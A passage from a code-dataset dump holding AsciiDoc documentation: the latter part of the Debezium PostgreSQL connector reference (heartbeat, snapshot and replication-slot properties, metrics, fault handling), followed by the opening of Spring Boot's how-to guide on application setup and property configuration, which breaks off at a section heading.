`+heartbeat.interval.ms+`>>\n|`0`\n|Controls how frequently the connector sends heartbeat messages to a Kafka topic. The default behavior is that the connector does not send heartbeat messages. +\n +\nHeartbeat messages are useful for monitoring whether the connector is receiving change events from the database. Heartbeat messages might help decrease the number of change events that need to be re-sent when a connector restarts. To send heartbeat messages, set this property to a positive integer, which indicates the number of milliseconds between heartbeat messages. +\n +\nHeartbeat messages are needed when there are many updates in a database that is being tracked but only a tiny number of updates are related to the table(s) and schema(s) for which the connector is capturing changes. In this situation, the connector reads from the database transaction log as usual but rarely emits change records to Kafka. This means that no offset updates are committed to Kafka and the connector does not have an opportunity to send the latest retrieved LSN to the database. The database retains WAL files that contain events that have already been processed by the connector. Sending heartbeat messages enables the connector to send the latest retrieved LSN to the database, which allows the database to reclaim disk space being used by no longer needed WAL files.\n\n|[[postgresql-property-heartbeat-topics-prefix]]<<postgresql-property-heartbeat-topics-prefix, `+heartbeat.topics.prefix+`>>\n|`__debezium-heartbeat`\n|Controls the name of the topic to which the connector sends heartbeat messages. The topic name has this pattern: +\n +\n_<heartbeat.topics.prefix>_._<server.name>_ +\n +\nFor example, if the database server name is `fulfillment`, the default topic name is `__debezium-heartbeat.fulfillment`.\n\n|[[postgresql-property-heartbeat-action-query]]<<postgresql-property-heartbeat-action-query, `+heartbeat.action.query+`>>\n|\n|Specifies a query that the connector executes on the source database when the connector sends a heartbeat message. +\n +\nThis is useful for resolving the situation described in {link-prefix}:{link-postgresql-connector}#postgresql-wal-disk-space[WAL disk space consumption], where capturing changes from a low-traffic database on the same host as a high-traffic database prevents {prodname} from processing WAL records and thus acknowledging WAL positions with the database. To address this situation, create a heartbeat table in the low-traffic database, and set this property to a statement that inserts records into that table, for example: +\n +\n`INSERT INTO test_heartbeat_table (text) VALUES ('test_heartbeat')` +\n +\nThis allows the connector to receive changes from the low-traffic database and acknowledge their LSNs, which prevents unbounded WAL growth on the database host.\n\n|[[postgresql-property-schema-refresh-mode]]<<postgresql-property-schema-refresh-mode, `+schema.refresh.mode+`>>\n|`columns_diff`\n|Specify the conditions that trigger a refresh of the in-memory schema for a table. +\n +\n`columns_diff` is the safest mode. It ensures that the in-memory schema stays in sync with the database table's schema at all times. +\n +\n`columns_diff_exclude_unchanged_toast` instructs the connector to refresh the in-memory schema cache if there is a discrepancy with the schema derived from the incoming message, unless unchanged TOASTable data fully accounts for the discrepancy. +\n +\nThis setting can significantly improve connector performance if there are frequently-updated tables that have TOASTed data that are rarely part of updates. However, it is possible for the in-memory schema to\nbecome outdated if TOASTable columns are dropped from the table.\n\n|[[postgresql-property-snapshot-delay-ms]]<<postgresql-property-snapshot-delay-ms, `+snapshot.delay.ms+`>>\n|\n|An interval in milliseconds that the connector should wait before performing a snapshot when the connector starts. If you are starting multiple connectors in a cluster, this property is useful for avoiding snapshot interruptions, which might cause re-balancing of connectors.\n\n|[[postgresql-property-snapshot-fetch-size]]<<postgresql-property-snapshot-fetch-size, `+snapshot.fetch.size+`>>\n|`10240`\n|During a snapshot, the connector reads table content in batches of rows. This property specifies the maximum number of rows in a batch.\n\n|[[postgresql-property-slot-stream-params]]<<postgresql-property-slot-stream-params, `+slot.stream.params+`>>\n|\n|Semicolon separated list of parameters to pass to the configured logical decoding plug-in. For example, `add-tables=public.table,public.table2;include-lsn=true`.\n\nifdef::community[]\nIf you are using the `wal2json` plug-in, this property is useful for enabling server-side table filtering. Allowed values depend on the configured plug-in.\nendif::community[]\n\n|[[postgresql-property-sanitize-field-names]]<<postgresql-property-sanitize-field-names, `+sanitize.field.names+`>>\n|`true` if connector configuration sets the `key.converter` or `value.converter` property to the Avro converter.\n\n`false` if not.\n|Indicates whether field names are sanitized to adhere to {link-prefix}:{link-avro-serialization}#avro-naming[Avro naming requirements].\n\n|[[postgresql-property-slot-max-retries]]<<postgresql-property-slot-max-retries, `+slot.max.retries+`>>\n|`6`\n|If connecting to a replication slot fails, this is the maximum number of consecutive attempts to connect.\n\n|[[postgresql-property-slot-retry-delay-ms]]<<postgresql-property-slot-retry-delay-ms, `+slot.retry.delay.ms+`>> +\n|`10000` (10 seconds)\n|The number of milliseconds to wait between retry attempts when the connector fails to connect to a replication slot.\n\n|[[postgresql-property-toasted-value-placeholder]]<<postgresql-property-toasted-value-placeholder, `+toasted.value.placeholder+`>>\n|`__debezium_unavailable_value`\n|Specifies the constant that the connector provides to indicate that the original value is a toasted value that is not provided by the database.\nIf the setting of `toasted.value.placeholder` starts with the `hex:` prefix it is expected that the rest of the string represents hexadecimally encoded octets. See {link-prefix}:{link-postgresql-connector}#postgresql-toasted-values[toasted values] for additional details.\n\n|[[postgresql-property-provide-transaction-metadata]]<<postgresql-property-provide-transaction-metadata, `+provide.transaction.metadata+`>>\n|`false`\n|Determines whether the connector generates events with transaction boundaries and enriches change event envelopes with transaction metadata. Specify `true` if you want the connector to do this. See {link-prefix}:{link-postgresql-connector}#postgresql-transaction-metadata[Transaction metadata] for details.\n\n|[[postgresql-property-retriable-restart-connector-wait-ms]]<<postgresql-property-retriable-restart-connector-wait-ms, `+retriable.restart.connector.wait.ms+`>> +\n|10000 (10 seconds)\n|The number of milliseconds to wait before restarting a connector after a retriable error occurs.\n\n|===\n\n[id=\"postgresql-pass-through-properties\"]\n.Pass-through connector configuration properties\nThe connector also supports _pass-through_ configuration properties that are used when creating the Kafka producer and consumer.\n\nBe sure to consult the {link-kafka-docs}.html[Kafka documentation] for all of the configuration properties for Kafka producers and consumers. The PostgreSQL connector does use the {link-kafka-docs}.html#consumerconfigs[new consumer configuration properties].\n\n\n\/\/ Type: assembly\n\/\/ ModuleID: monitoring-debezium-postgresql-connector-performance\n\/\/ Title: Monitoring {prodname} PostgreSQL connector performance\n[[postgresql-monitoring]]\n== Monitoring\n\nThe {prodname} PostgreSQL connector provides two types of metrics that are in addition to the built-in support for JMX metrics that Zookeeper, Kafka, and Kafka Connect provide.\n\n* {link-prefix}:{link-postgresql-connector}#postgresql-snapshot-metrics[Snapshot metrics] provide information about connector operation while performing a snapshot.\n* {link-prefix}:{link-postgresql-connector}#postgresql-streaming-metrics[Streaming metrics] provide information about connector operation when the connector is capturing changes and streaming change event records.\n\n{link-prefix}:{link-debezium-monitoring}#monitoring-debezium[{prodname} monitoring documentation] provides details for how to expose these metrics by using JMX.\n\n\/\/ Type: reference\n\/\/ ModuleID: monitoring-debezium-during-snapshots-of-postgresql-databases\n\/\/ Title: Monitoring {prodname} during snapshots of PostgreSQL databases\n[[postgresql-snapshot-metrics]]\n=== Snapshot metrics\n\nThe *MBean* is `debezium.postgres:type=connector-metrics,context=snapshot,server=_<database.server.name>_`.\n\ninclude::{partialsdir}\/modules\/all-connectors\/ref-connector-monitoring-snapshot-metrics.adoc[leveloffset=+1]\n\n\/\/ Type: reference\n\/\/ ModuleID: monitoring-debezium-postgresql-connector-record-streaming\n\/\/ Title: Monitoring {prodname} PostgreSQL connector record streaming\n[[postgresql-streaming-metrics]]\n=== Streaming metrics\n\nThe *MBean* is `debezium.postgres:type=connector-metrics,context=streaming,server=_<database.server.name>_`.\n\ninclude::{partialsdir}\/modules\/all-connectors\/ref-connector-monitoring-streaming-metrics.adoc[leveloffset=+1]\n\n\n\n\/\/ Type: reference\n\/\/ ModuleID: how-debezium-postgresql-connectors-handle-faults-and-problems\n\/\/ Title: How {prodname} PostgreSQL connectors handle faults and problems\n[[postgresql-when-things-go-wrong]]\n== Behavior when things go wrong\n\n{prodname} is a distributed system that captures all changes in multiple upstream databases; it never misses or loses an event. When the system is operating normally or being managed carefully then {prodname} provides _exactly once_ delivery of every change event record.\n\nIf a fault does happen then the system does not lose any events. However, while it is recovering from the fault, it might repeat some change events. In these abnormal situations, {prodname}, like Kafka, provides _at least once_ delivery of change events.\n\nifdef::community[]\nThe rest of this section describes how {prodname} handles various kinds of faults and problems.\nendif::community[]\n\nifdef::product[]\nDetails are in the following sections:\n\n* xref:postgresql-connector-configuration-and-startup-errors[]\n* xref:postgresql-becomes-unavailable[]\n* xref:postgresql-cluster-failures[]\n* xref:postgresql-kafka-connect-process-stops-gracefully[]\n* xref:postgresql-kafka-connect-process-crashes[]\n* xref:postgresql-kafka-becomes-unavailable[]\n* xref:postgresql-connector-is-stopped-for-a-duration[]\nendif::product[]\n\n[id=\"postgresql-connector-configuration-and-startup-errors\"]\n=== Configuration and startup errors\n\nIn the following situations, the connector fails when trying to start, reports an error\/exception in the log, and stops running:\n\n* The connector's configuration is invalid.\n* The connector cannot successfully connect to PostgreSQL by using the specified connection parameters.\n* The connector is restarting from a previously-recorded position in the PostgreSQL WAL (by using the LSN) and PostgreSQL no longer has that history available.\n\nIn these cases, the error message has details about the problem and possibly a suggested workaround. After you correct the configuration or address the PostgreSQL problem, restart the connector.\n\n[id=\"postgresql-becomes-unavailable\"]\n=== PostgreSQL becomes unavailable\n\nWhen the connector is running, the PostgreSQL server that it is connected to could become unavailable for any number of reasons. If this happens, the connector fails with an error and stops. When the server is available again, restart the connector.\n\nThe PostgreSQL connector externally stores the last processed offset in the form of a PostgreSQL LSN. After a connector restarts and connects to a server instance, the connector communicates with the server to continue streaming from that particular offset. This offset is available as long as the {prodname} replication slot remains intact. Never drop a replication slot on the primary server or you will lose data. See the next section for failure cases in which a slot has been removed.\n\n[id=\"postgresql-cluster-failures\"]\n=== Cluster failures\n\nAs of release 12, PostgreSQL allows logical replication slots _only on primary servers_. This means that you can point a {prodname} PostgreSQL connector to only the active primary server of a database cluster.\nAlso, replication slots themselves are not propagated to replicas.\nIf the primary server goes down, a new primary must be promoted.\n\nifdef::community[]\nThe new primary must have the {link-prefix}:{link-postgresql-connector}#installing-postgresql-output-plugin[logical decoding plug-in] installed and a replication slot that is configured for use by the plug-in and the database for which you want to capture changes. Only then can you point the connector to the new server and restart the connector.\nendif::community[]\n\nifdef::product[]\nThe new primary must have a replication slot that is configured for use by the `pgoutput` plug-in and the database in which you want to capture changes. Only then can you point the connector to the new server and restart the connector.\nendif::product[]\n\nThere are important caveats when failovers occur and you should pause {prodname} until you can verify that you have an intact replication slot that has not lost data. After a failover:\n\n* There must be a process that re-creates the {prodname} replication slot before allowing the application to write to the *new* primary. This is crucial. Without this process, your application can miss change events.\n\n* You might need to verify that {prodname} was able to read all changes in the slot **before the old primary failed**.\n\nOne reliable method of recovering and verifying whether any changes were lost is to recover a backup of the failed primary to the point immediately before it failed. While this can be administratively difficult, it allows you to inspect the replication slot for any unconsumed changes.\n\nifdef::community[]\n\n[NOTE]\n====\nThere are discussions in the PostgreSQL community around a feature called `failover slots` that would help mitigate this problem, but as of PostgreSQL 12, they have not been implemented. However, there is active development for PostgreSQL 13 to support logical decoding on standbys, which is a major requirement to make failover possible. You can find more about this in this link:\"https:\/\/www.postgresql.org\/message-id\/CAJ3gD9fE=0w50sRagcs+jrktBXuJAWGZQdSTMa57CCY+Dh-xbg@mail.gmail.com\"[community thread].\n\nMore about the concept of failover slots is in link:http:\/\/blog.2ndquadrant.com\/failover-slots-postgresql[this blog post].\n====\nendif::community[]\n\n[id=\"postgresql-kafka-connect-process-stops-gracefully\"]\n=== Kafka Connect process stops gracefully\n\nSuppose that Kafka Connect is being run in distributed mode and a Kafka Connect process is stopped gracefully. Prior to shutting down that process, Kafka Connect migrates the process's connector tasks to another Kafka Connect process in that group. The new connector tasks start processing exactly where the prior tasks stopped. There is a short delay in processing while the connector tasks are stopped gracefully and restarted on the new processes.\n\n[id=\"postgresql-kafka-connect-process-crashes\"]\n=== Kafka Connect process crashes\n\nIf the Kafka Connector process stops unexpectedly, any connector tasks it was running terminate without recording their most recently processed offsets. When Kafka Connect is being run in distributed mode, Kafka Connect restarts those connector tasks on other processes. However, PostgreSQL connectors resume from the last offset that was _recorded_ by the earlier processes. This means that the new replacement tasks might generate some of the same change events that were processed just prior to the crash. The number of duplicate events depends on the offset flush period and the volume of data changes just before the crash.\n\nBecause there is a chance that some events might be duplicated during a recovery from failure, consumers should always anticipate some duplicate events. {prodname} changes are idempotent, so a sequence of events always results in the same state.\n\nIn each change event record, {prodname} connectors insert source-specific information about the origin of the event, including the PostgreSQL server's time of the event, the ID of the server transaction, and the position in the write-ahead log where the transaction changes were written. Consumers can keep track of this information, especially the LSN, to determine whether an event is a duplicate.\n\n[id=\"postgresql-kafka-becomes-unavailable\"]\n=== Kafka becomes unavailable\n\nAs the connector generates change events, the Kafka Connect framework records those events in Kafka by using the Kafka producer API. Periodically, at a frequency that you specify in the Kafka Connect configuration, Kafka Connect records the latest offset that appears in those change events. If the Kafka brokers become unavailable, the Kafka Connect process that is running the connectors repeatedly tries to reconnect to the Kafka brokers. In other words, the connector tasks pause until a connection can be re-established, at which point the connectors resume exactly where they left off.\n\n[id=\"postgresql-connector-is-stopped-for-a-duration\"]\n=== Connector is stopped for a duration\n\nIf the connector is gracefully stopped, the database can continue to be used. Any changes are recorded in the PostgreSQL WAL. When the connector restarts, it resumes streaming changes where it left off. That is, it generates change event records for all database changes that were made while the connector was stopped.\n\nA properly configured Kafka cluster is able to handle massive throughput. Kafka Connect is written according to Kafka best practices, and given enough resources a Kafka Connect connector can also handle very large numbers of database change events. Because of this, after being stopped for a while, when a {prodname} connector restarts, it is very likely to catch up with the database changes that were made while it was stopped. How quickly this happens depends on the capabilities and performance of Kafka and the volume of changes being made to the data in PostgreSQL.\n","returncode":0,"stderr":"","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"3c761cfc966b8c944eff63773e6ebfd0dd9f573a","subject":"Polish 'Database Initialization' section","message":"Polish 'Database Initialization' section\n\nSee gh-15859\n","repos":"spring-projects\/spring-boot,wilkinsona\/spring-boot,aahlenst\/spring-boot,philwebb\/spring-boot,scottfrederick\/spring-boot,shakuzen\/spring-boot,wilkinsona\/spring-boot,eddumelendez\/spring-boot,lburgazzoli\/spring-boot,joshiste\/spring-boot,jxblum\/spring-boot,jxblum\/spring-boot,dreis2211\/spring-boot,tiarebalbi\/spring-boot,philwebb\/spring-boot,chrylis\/spring-boot,hello2009chen\/spring-boot,donhuvy\/spring-boot,lburgazzoli\/spring-boot,tiarebalbi\/spring-boot,rweisleder\/spring-boot,rweisleder\/spring-boot,mbenson\/spring-boot,rweisleder\/spring-boot,eddumelendez\/spring-boot,wilkinsona\/spring-boot,mbenson\/spring-boot,michael-simons\/spring-boot,ilayaperumalg\/spring-boot,jxblum\/spring-boot,donhuvy\/spring-boot,lburgazzoli\/spring-boot,mdeinum\/spring-boot,ilayaperumalg\/spring-boot,philwebb\/spring-boot,chrylis\/spring-boot,michael-simons\/spring-boot,aahlenst\/spring-boot,royclarkson\/spring-boot,htynkn\/spring-boot,kdvolder\/spring-boot,donhuvy\/spring-boot,aahlenst\/spring-boot,shakuzen\/spring-boot,rweisleder\/spring-boot,hello2009chen\/spring-boot,spring-projects\/spring-boot,eddumelendez\/spring-boot,tiarebalbi\/spring-boot,yangdd1205\/spring-boot,joshiste\/spring-boot,eddumelendez\/spring-boot,aahlenst\/spring-boot,joshiste\/spring-boot,aahlenst\/spring-boot,mdeinum\/spring-boot,mdeinum\/spring-boot,yangdd1205\/spring-boot,scottfrederick\/spring-boot,jxblum\/spring-boot,wilkinsona\/spring-boot,Buzzardo\/spring-boot,kdvolder\/spring-boot,hello2009chen\/spring-boot,vpavic\/spring-boot,Buzzardo\/spring-boot,shakuzen\/spring-boot,aahlenst\/spring-boot,wilkinsona\/spring-boot,michael-simons\/spring-boot,rweisleder\/spring-boot,royclarkson\/spring-boot,htynkn\/spring-boot,ilayaperumalg\/spring-boot,scottfrederick\/spring-boot,vpavic\/spring-boot,michael-simons\/spring-boot,eddumelendez\/spring-boot,spring-projects\/spring-boot,shakuzen\/spring-boot,Buzzardo\/spring-boot,philwebb\/spring-boot,Buzzardo\/spring-boot,NetoDevel\/spring-boot,htynkn\/spring-boot,lburgazzoli\/spring-boot,chrylis\/spring-boot,yangdd1205\/spring-boot,ilayaperumalg\/spring-boot,dreis2211\/spring-boot,royclarkson\/spring-boot,spring-projects\/spring-boot,Buzzardo\/spring-boot,philwebb\/spring-boot,donhuvy\/spring-boot,vpavic\/spring-boot,royclarkson\/spring-boot,rweisleder\/spring-boot,mbenson\/spring-boot,michael-simons\/spring-boot,NetoDevel\/spring-boot,donhuvy\/spring-boot,dreis2211\/spring-boot,ilayaperumalg\/spring-boot,chrylis\/spring-boot,michael-simons\/spring-boot,dreis2211\/spring-boot,tiarebalbi\/spring-boot,donhuvy\/spring-boot,spring-projects\/spring-boot,jxblum\/spring-boot,kdvolder\/spring-boot,shakuzen\/spring-boot,royclarkson\/spring-boot,jxblum\/spring-boot,hello2009chen\/spring-boot,mbenson\/spring-boot,mdeinum\/spring-boot,vpavic\/spring-boot,NetoDevel\/spring-boot,NetoDevel\/spring-boot,ilayaperumalg\/spring-boot,philwebb\/spring-boot,mdeinum\/spring-boot,spring-projects\/spring-boot,vpavic\/spring-boot,joshiste\/spring-boot,NetoDevel\/spring-boot,tiarebalbi\/spring-boot,dreis2211\/spring-boot,scottfrederick\/spring-boot,eddumelendez\/spring-boot,htynkn\/spring-boot,shakuzen\/spring-boot,scottfrederick\/spring-boot,chrylis\/spring-boot,Buzzardo\/spring-boot,kdvolder\/spring-boot,vpavic\/spring-boot,scottfrederick\/spring-boot,tiarebalbi\/spring-boot,kdvolder\/spring-boot,mbenson\/spring-boot,wilkinsona\/spring-boot,chrylis\/spring-boot,joshiste\/spring-boot,mbenson\/spring-boot,kdvolder\/spring-boot,hello2009chen\/spring-boot,htynkn\/spring-boot,dreis2211\/spring-boot,lburgazzoli\/spring-boot,htynkn\/spring-boot,joshiste\/spring-boot,mdeinum\/spring-boot","old_file":"spring-boot-project\/spring-boot-docs\/src\/main\/asciidoc\/howto.adoc","new_file":"spring-boot-project\/spring-boot-docs\/src\/main\/asciidoc\/howto.adoc","new_contents":"[[howto]]\n= '`How-to`' guides\n\n[partintro]\n--\nThis section provides answers to some common '`how do I do that...`' questions\nthat often arise when using Spring Boot. Its coverage is not exhaustive, but it\ndoes cover quite a lot.\n\nIf you have a specific problem that we do not cover here, you might want to check out\nhttps:\/\/stackoverflow.com\/tags\/spring-boot[stackoverflow.com] to see if someone has\nalready provided an answer. This is also a great place to ask new questions (please use\nthe `spring-boot` tag).\n\nWe are also more than happy to extend this section. If you want to add a '`how-to`',\nsend us a {github-code}[pull request].\n--\n\n\n\n[[howto-spring-boot-application]]\n== Spring Boot Application\n\nThis section includes topics relating directly to Spring Boot applications.\n\n\n\n[[howto-failure-analyzer]]\n=== Create Your Own FailureAnalyzer\n{dc-spring-boot}\/diagnostics\/FailureAnalyzer.{dc-ext}[`FailureAnalyzer`] is a great way\nto intercept an exception on startup and turn it into a human-readable message, wrapped\nin a {dc-spring-boot}\/diagnostics\/FailureAnalysis.{dc-ext}[`FailureAnalysis`]. Spring\nBoot provides such an analyzer for application-context-related exceptions, JSR-303\nvalidations, and more. You can also create your own.\n\n`AbstractFailureAnalyzer` is a convenient extension of `FailureAnalyzer` that checks the\npresence of a specified exception type in the exception to handle. You can extend from\nthat so that your implementation gets a chance to handle the exception only when it is\nactually present. If, for whatever reason, you cannot handle the exception, return `null`\nto give another implementation a chance to handle the exception.\n\n`FailureAnalyzer` implementations must be registered in `META-INF\/spring.factories`.\nThe following example registers `ProjectConstraintViolationFailureAnalyzer`:\n\n[source,properties,indent=0]\n----\n\torg.springframework.boot.diagnostics.FailureAnalyzer=\\\n\tcom.example.ProjectConstraintViolationFailureAnalyzer\n----\n\nNOTE: If you need access to the `BeanFactory` or the `Environment`, your `FailureAnalyzer`\ncan simply implement `BeanFactoryAware` or `EnvironmentAware` respectively.\n\n\n\n[[howto-troubleshoot-auto-configuration]]\n=== Troubleshoot Auto-configuration\nThe Spring Boot auto-configuration tries its best to \"`do the right thing`\", but\nsometimes things fail, and it can be hard to tell why.\n\nThere is a really useful `ConditionEvaluationReport` available in any Spring Boot\n`ApplicationContext`. You can see it if you enable `DEBUG` logging output. If you use\nthe `spring-boot-actuator` (see <<production-ready-features.adoc,the Actuator chapter>>),\nthere is also a `conditions` endpoint that renders the report in JSON. Use that endpoint\nto debug the application and see what features have been added (and which have not been\nadded) by Spring Boot at runtime.\n\nMany more questions can be answered by looking at the source code and the Javadoc. When\nreading the code, remember the following rules of thumb:\n\n* Look for classes called `+*AutoConfiguration+` and read their sources. Pay special\nattention to the `+@Conditional*+` annotations to find out what features they enable and\nwhen. Add `--debug` to the command line or a System property `-Ddebug` to get a log on the\nconsole of all the auto-configuration decisions that were made in your app. In a running\nActuator app, look at the `conditions` endpoint (`\/actuator\/conditions` or the JMX\nequivalent) for the same information.\n* Look for classes that are `@ConfigurationProperties` (such as\n{sc-spring-boot-autoconfigure}\/web\/ServerProperties.{sc-ext}[`ServerProperties`])\nand read from there the available external configuration options. The\n`@ConfigurationProperties` annotation has a `name` attribute that acts as a prefix to\nexternal properties. Thus, `ServerProperties` has `prefix=\"server\"` and its configuration\nproperties are `server.port`, `server.address`, and others. In a running Actuator app,\nlook at the `configprops` endpoint.\n* Look for uses of the `bind` method on the `Binder` to pull configuration values\nexplicitly out of the `Environment` in a relaxed manner. It is often used with a prefix.\n* Look for `@Value` annotations that bind directly to the `Environment`.\n* Look for `@ConditionalOnExpression` annotations that switch features on and off in\nresponse to SpEL expressions, normally evaluated with placeholders resolved from the\n`Environment`.\n\n\n\n[[howto-customize-the-environment-or-application-context]]\n=== Customize the Environment or ApplicationContext Before It Starts\nA `SpringApplication` has `ApplicationListeners` and `ApplicationContextInitializers` that\nare used to apply customizations to the context or environment. Spring Boot loads a number\nof such customizations for use internally from `META-INF\/spring.factories`. There is more\nthan one way to register additional customizations:\n\n* Programmatically, per application, by calling the `addListeners` and `addInitializers`\nmethods on `SpringApplication` before you run it.\n* Declaratively, per application, by setting the `context.initializer.classes` or\n`context.listener.classes` properties.\n* Declaratively, for all applications, by adding a `META-INF\/spring.factories` and packaging\na jar file that the applications all use as a library.\n\nThe `SpringApplication` sends some special `ApplicationEvents` to the listeners (some\neven before the context is created) and then registers the listeners for events published\nby the `ApplicationContext` as well. See\n\"`<<spring-boot-features.adoc#boot-features-application-events-and-listeners>>`\" in the\n'`Spring Boot features`' section for a complete list.\n\nIt is also possible to customize the `Environment` before the application context is\nrefreshed by using `EnvironmentPostProcessor`. Each implementation should be registered in\n`META-INF\/spring.factories`, as shown in the following example:\n\n[source,properties,indent=0]\n----\n\torg.springframework.boot.env.EnvironmentPostProcessor=com.example.YourEnvironmentPostProcessor\n----\n\nThe implementation can load arbitrary files and add them to the `Environment`. For\ninstance, the following example loads a YAML configuration file from the classpath:\n\n\n[source,java,indent=0]\n----\ninclude::{code-examples}\/context\/EnvironmentPostProcessorExample.java[tag=example]\n----\n\nTIP: The `Environment` has already been prepared with all the usual property sources\nthat Spring Boot loads by default. It is therefore possible to get the location of the\nfile from the environment. The preceding example adds the `custom-resource` property\nsource at the end of the list so that a key defined in any of the usual other locations\ntakes precedence. A custom implementation may define another order.\n\nCAUTION: While using `@PropertySource` on your `@SpringBootApplication` may seem to be a\nconvenient and easy way to load a custom resource in the `Environment`, we do not\nrecommend it, because Spring Boot prepares the `Environment` before the\n`ApplicationContext` is refreshed. Any key defined with `@PropertySource` is loaded too\nlate to have any effect on auto-configuration.\n\n\n\n[[howto-build-an-application-context-hierarchy]]\n=== Build an ApplicationContext Hierarchy (Adding a Parent or Root Context)\nYou can use the `ApplicationBuilder` class to create parent\/child `ApplicationContext`\nhierarchies. See \"`<<spring-boot-features.adoc#boot-features-fluent-builder-api>>`\"\nin the '`Spring Boot features`' section for more information.\n\n\n\n[[howto-create-a-non-web-application]]\n=== Create a Non-web Application\nNot all Spring applications have to be web applications (or web services). If you want to\nexecute some code in a `main` method but also bootstrap a Spring application to set up\nthe infrastructure to use, you can use the `SpringApplication` features of Spring\nBoot. A `SpringApplication` changes its `ApplicationContext` class, depending on whether\nit thinks it needs a web application or not. The first thing you can do to help it is to\nleave server-related dependencies (e.g. servlet API) off the classpath. If you cannot do\nthat (for example, you run two applications from the same code base) then you can\nexplicitly call `setWebApplicationType(WebApplicationType.NONE)` on your\n`SpringApplication` instance or set the `applicationContextClass` property (through the\nJava API or with external properties). Application code that you want to run as your\nbusiness logic can be implemented as a `CommandLineRunner` and dropped into the context as\na `@Bean` definition.\n\n\n\n[[howto-properties-and-configuration]]\n== Properties and Configuration\n\nThis section includes topics about setting and reading properties and configuration\nsettings and their interaction with Spring Boot applications.\n\n[[howto-automatic-expansion]]\n=== Automatically Expand Properties at Build Time\nRather than hardcoding some properties that are also specified in your project's build\nconfiguration, you can automatically expand them by instead using the existing build\nconfiguration. This is possible in both Maven and Gradle.\n\n\n\n[[howto-automatic-expansion-maven]]\n==== Automatic Property Expansion Using Maven\nYou can automatically expand properties from the Maven project by using resource\nfiltering. If you use the `spring-boot-starter-parent`, you can then refer to your\nMaven '`project properties`' with `@..@` placeholders, as shown in the following example:\n\n[source,properties,indent=0]\n----\n\tapp.encoding=@project.build.sourceEncoding@\n\tapp.java.version=@java.version@\n----\n\nNOTE: Only production configuration is filtered that way (in other words, no filtering is\napplied on `src\/test\/resources`).\n\nTIP: If you enable the `addResources` flag, the `spring-boot:run` goal can add\n`src\/main\/resources` directly to the classpath (for hot reloading purposes). Doing so\ncircumvents the resource filtering and this feature. Instead, you can use the `exec:java`\ngoal or customize the plugin's configuration. See the\n{spring-boot-maven-plugin-site}\/usage.html[plugin usage page] for more details.\n\nIf you do not use the starter parent, you need to include the following element inside\nthe `<build\/>` element of your `pom.xml`:\n\n[source,xml,indent=0]\n----\n\t<resources>\n\t\t<resource>\n\t\t\t<directory>src\/main\/resources<\/directory>\n\t\t\t<filtering>true<\/filtering>\n\t\t<\/resource>\n\t<\/resources>\n----\n\nYou also need to include the following element inside `<plugins\/>`:\n\n[source,xml,indent=0]\n----\n\t<plugin>\n\t\t<groupId>org.apache.maven.plugins<\/groupId>\n\t\t<artifactId>maven-resources-plugin<\/artifactId>\n\t\t<version>2.7<\/version>\n\t\t<configuration>\n\t\t\t<delimiters>\n\t\t\t\t<delimiter>@<\/delimiter>\n\t\t\t<\/delimiters>\n\t\t\t<useDefaultDelimiters>false<\/useDefaultDelimiters>\n\t\t<\/configuration>\n\t<\/plugin>\n----\n\nNOTE: The `useDefaultDelimiters` property is important if you use standard Spring\nplaceholders (such as `${placeholder}`) in your configuration. If that property is not\nset to `false`, these may be expanded by the build.\n\n\n\n[[howto-automatic-expansion-gradle]]\n==== Automatic Property Expansion Using Gradle\nYou can automatically expand properties from the Gradle project by configuring the\nJava plugin's `processResources` task to do so, as shown in the following example:\n\n[source,groovy,indent=0]\n----\n\tprocessResources {\n\t\texpand(project.properties)\n\t}\n----\n\nYou can then refer to your Gradle project's properties by using placeholders, as shown in the\nfollowing example:\n\n[source,properties,indent=0]\n----\n\tapp.name=${name}\n\tapp.description=${description}\n----\n\nNOTE: Gradle's `expand` method uses Groovy's `SimpleTemplateEngine`, which transforms\n`${..}` tokens. The `${..}` style conflicts with Spring's own property placeholder\nmechanism. To use Spring property placeholders together with automatic expansion, escape\nthe Spring property placeholders as follows: `\\${..}`.\n\n\n\n\n[[howto-externalize-configuration]]\n=== Externalize the Configuration of `SpringApplication`\nA `SpringApplication` has bean properties (mainly setters), so you can use its Java API as\nyou create the application to modify its behavior. Alternatively, you can externalize the\nconfiguration by setting properties in `+spring.main.*+`. For example, in\n`application.properties`, you might have the following settings:\n\n[source,properties,indent=0,subs=\"verbatim,quotes,attributes\"]\n----\n\tspring.main.web-application-type=none\n\tspring.main.banner-mode=off\n----\n\nThen the Spring Boot banner is not printed on startup, and the application is not starting\nan embedded web server.\n\nProperties defined in external configuration override the values specified with the Java\nAPI, with the notable exception of the sources used to create the `ApplicationContext`.\nConsider the following application:\n\n[source,java,indent=0]\n----\n\tnew SpringApplicationBuilder()\n\t\t.bannerMode(Banner.Mode.OFF)\n\t\t.sources(demo.MyApp.class)\n\t\t.run(args);\n----\n\nNow consider the following configuration:\n\n[source,properties,indent=0,subs=\"verbatim,quotes,attributes\"]\n----\n\tspring.main.sources=com.acme.Config,com.acme.ExtraConfig\n\tspring.main.banner-mode=console\n----\n\nThe actual application _now_ shows the banner (as overridden by configuration) and uses\nthree sources for the `ApplicationContext` (in the following order): `demo.MyApp`,\n`com.acme.Config`, and `com.acme.ExtraConfig`.\n\n\n\n[[howto-change-the-location-of-external-properties]]\n=== Change the Location of External Properties of an Application\nBy default, properties from different sources are added to the Spring `Environment` in a\ndefined order (see \"`<<spring-boot-features.adoc#boot-features-external-config>>`\" in\nthe '`Spring Boot features`' section for the exact order).\n\nA nice way to augment and modify this ordering is to add `@PropertySource` annotations to your\napplication sources. Classes passed to the `SpringApplication` static convenience\nmethods and those added using `setSources()` are inspected to see if they have\n`@PropertySources`. If they do, those properties are added to the `Environment` early\nenough to be used in all phases of the `ApplicationContext` lifecycle. Properties added\nin this way have lower priority than any added by using the default locations (such as\n`application.properties`), system properties, environment variables, or the command line.\n\nYou can also provide the following System properties (or environment variables) to change\nthe behavior:\n\n* `spring.config.name` (`SPRING_CONFIG_NAME`): Defaults to `application` as the root of\nthe file name.\n* `spring.config.location` (`SPRING_CONFIG_LOCATION`): The file to load (such as a\nclasspath resource or a URL). A separate `Environment` property source is set up for this\ndocument and it can be overridden by system properties, environment variables, or the\ncommand line.\n\nNo matter what you set in the environment, Spring Boot always loads\n`application.properties` as described above. By default, if YAML is used, then files with\nthe '`.yml`' extension are also added to the list.\n\nSpring Boot logs the configuration files that are loaded at the `DEBUG` level and the\ncandidates it has not found at `TRACE` level.\n\nSee {sc-spring-boot}\/context\/config\/ConfigFileApplicationListener.{sc-ext}[`ConfigFileApplicationListener`]\nfor more detail.\n\n\n\n[[howto-use-short-command-line-arguments]]\n=== Use 